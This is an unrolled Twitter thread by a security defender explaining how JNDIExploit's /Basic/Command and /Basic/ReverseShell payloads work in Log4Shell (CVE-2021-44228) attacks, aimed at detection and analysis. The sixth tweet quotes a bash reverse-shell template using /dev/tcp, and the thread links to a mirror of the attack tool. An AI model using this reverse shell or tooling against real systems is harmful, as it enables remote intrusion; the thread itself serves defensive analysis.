geech 👽👾 Profile picture
Dec 13, 2021 8 tweets 6 min read Read on X
In a conversation I had with some folks yesterday about different exploit techniques for CVE-2021-44228, there was some confusion around how the /Basic/Command JNDI strings work. Let me break down what's happening here in a🧵(1/8)

#Log4Shell #log4j
First, these URIs are not a native part of the LDAP protocol. They aren't being handled by the JNDI lookup internally, and still require an outbound TCP connection to the attacker's malicious TCP server.

#Log4Shell #log4j

(2/8)
These URIs are observed when attackers use JNDIExploit for their malicious LDAP server. The original repo, github.com/0x727/JNDIExpl…, is no longer available, but this is a mirror of that repo I believe:

github.com/zzwlpx/JNDIExp…

#Log4Shell #log4j

(3/8)
As you can see from the project README, there are many different types of payloads that can be executed. I've observed /Basic/Command/Base64 and /Basic/ReverseShell, and I'm sure other defenders are seeing more of these.

#Log4Shell #log4j

(4/8)
/Basic/Command and /Basic/Command/Base64 use Runtime.getRuntime().exec() to run an arbitrary shell command, which is specified in the URI (optionally base64 encoded)

#Log4Shell #log4j

(5/8)
/Basic/ReverseShell doesn't use Java TCP socket code to spawn the shell. Rather, it shells out using the same technique and redirects bash to a TCP connection (good postexp detection opportunity!):

"/bin/bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1"

#Log4Shell #log4j

(6/8)
I've observed the actors deploying the Kinsing/REDSONJA backdoor using this malicious LDAP server and /Basic/Command/Base64, and there are plenty of other actors using this technique as well. It is commonly used in many PoC exploits on GitHub.

#Log4Shell #log4j

(7/8)
tl;dr /Basic/Command/Base64 still requires outbound TCP to successfully execute, and you can base64 decode the payload to observe the final shell command that will be executed, making analysis of that connection a bit easier.

#Log4Shell #log4j

(8/8)

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with geech 👽👾

geech 👽👾 Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(